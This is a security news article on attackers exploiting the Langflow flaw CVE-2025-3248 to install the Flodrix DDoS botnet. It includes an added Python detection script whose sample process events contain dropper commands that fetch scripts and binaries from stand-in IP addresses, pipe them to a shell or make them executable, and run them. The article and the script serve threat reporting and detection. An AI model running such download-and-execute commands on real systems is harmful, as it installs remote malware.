Cybersecurity researchers are calling attention to a new campaign that is actively exploiting a recently disclosed critical security flaw. This campaign is leveraging a vulnerability in the AI application framework Langflow to deliver the potent Flodrix botnet malware. Attackers use this vulnerability to execute downloader scripts on many compromised Langflow servers, which then fetch and install the malware. This activity entails the exploitation of CVE-2025-3248, a missing authentication vulnerability in Langflow with a critical 9.8 CVSS score. Successful exploitation of this flaw could enable unauthenticated attackers to execute arbitrary code via specially crafted HTTP requests on servers.
The latest findings from Trend Micro show that the threat actors are specifically targeting unpatched, internet-exposed Langflow instances. They use publicly available proof-of-concept code to conduct reconnaissance and then drop a shell script downloader onto the server. This downloader retrieves and executes the Flodrix botnet malware from a hardcoded, attacker-controlled IP address. Once installed on a compromised system, Flodrix establishes communications with a remote server and receives commands over TCP that direct it to launch distributed denial-of-service (DDoS) attacks against targets of the operators' choosing.
Flodrix also supports making its command-and-control connections over the Tor anonymity network to hide its activities.
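The infection chain described above (a shell downloader fetching a payload from a hardcoded IP and executing it, spawned from a web application process) leaves a recognisable trace in process telemetry. The following Python is an added detection example, not code from the article or from Trend Micro; the auditd-style event lines, the IP addresses and the Langflow command line are constructed sample data.

```python
import re

# Constructed process-execution events in an auditd-like key=value form;
# sample data for this example, not telemetry from the campaign.
SAMPLE_EVENTS = [
    "pid=4410 ppid=1 comm=python3 cmd=python3 -m langflow run --host 0.0.0.0",
    "pid=4521 ppid=4410 comm=sh cmd=sh -c 'curl -fsSL http://203.0.113.45/dl.sh | sh'",
    "pid=4530 ppid=4521 comm=sh cmd=wget -q http://203.0.113.45/bot -O /tmp/.b && chmod +x /tmp/.b && /tmp/.b",
    "pid=4601 ppid=1 comm=sh cmd=curl -fsSL https://pypi.org/simple/langflow/ -o /tmp/index.html",
    "pid=4602 ppid=1 comm=sh cmd=curl -s http://198.51.100.7/health",
]

EVENT_RE = re.compile(r"pid=(\d+) ppid=(\d+) comm=(\S+) cmd=(.*)")
# URL whose host is a bare IPv4 literal: no DNS lookup, typical of hardcoded dropper hosts.
IP_URL_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?/")
# Fetched content piped straight into a shell, or a downloaded file made executable and run.
PIPE_TO_SH_RE = re.compile(r"\|\s*(?:ba)?sh\b")
CHMOD_EXEC_RE = re.compile(r"chmod\s+\+x\s+(\S+).*?(?:&&|;)\s*\1\b")

def parse_events(lines):
    """Return a dict pid -> (ppid, comm, cmd) for well-formed lines."""
    procs = {}
    for line in lines:
        m = EVENT_RE.match(line)
        if m:
            pid, ppid, comm, cmd = m.groups()
            procs[int(pid)] = (int(ppid), comm, cmd)
    return procs

def descends_from_langflow(pid, procs):
    """Walk the parent chain and report whether any ancestor is a Langflow process."""
    seen = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        ppid, _, cmd = procs[pid]
        if "langflow" in cmd.lower():
            return True
        pid = ppid
    return False

def find_dropper_activity(lines):
    """Flag commands that fetch from a raw IP and immediately execute the result.
    Returns (pid, host, reasons) tuples; reasons explain why the command scored."""
    procs = parse_events(lines)
    findings = []
    for pid, (ppid, comm, cmd) in procs.items():
        ip = IP_URL_RE.search(cmd)
        if not ip:
            continue  # downloads from named hosts are out of scope for this heuristic
        reasons = ["fetch from bare IP literal"]
        if PIPE_TO_SH_RE.search(cmd):
            reasons.append("piped to shell")
        if CHMOD_EXEC_RE.search(cmd):
            reasons.append("downloaded file made executable and run")
        if len(reasons) == 1:
            continue  # a fetch alone is weak evidence; require an execution step
        if descends_from_langflow(ppid, procs):
            reasons.append("spawned under the Langflow process")
        findings.append((pid, ip.group(1), reasons))
    return findings
```

The Langflow-ancestry check is what separates a web-application compromise from an administrator running the same download by hand; in a real deployment the sample list would be replaced by the EDR or auditd feed.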
Security researchers currently assess Flodrix to be an evolution of another botnet, LeetHozer, which has previously been linked to the cybercriminal group known as Moobot. The improved Flodrix variant adds the ability to quietly remove itself from an infected system and to minimize its forensic traces.
This makes it much harder for incident responders to analyze the full scope of the attack after it has already occurred.
Another significant change in this variant is the introduction of new DDoS attack types, which are now also encrypted. This adds a further layer of obfuscation that can complicate network-based detection by security products. Trend Micro said it has identified the unknown threat actors hosting different downloader scripts on the same host used to fetch Flodrix, which strongly suggests that the campaign is under active development. The attackers are likely profiling vulnerable Langflow servers to identify high-value targets for future, more damaging infections.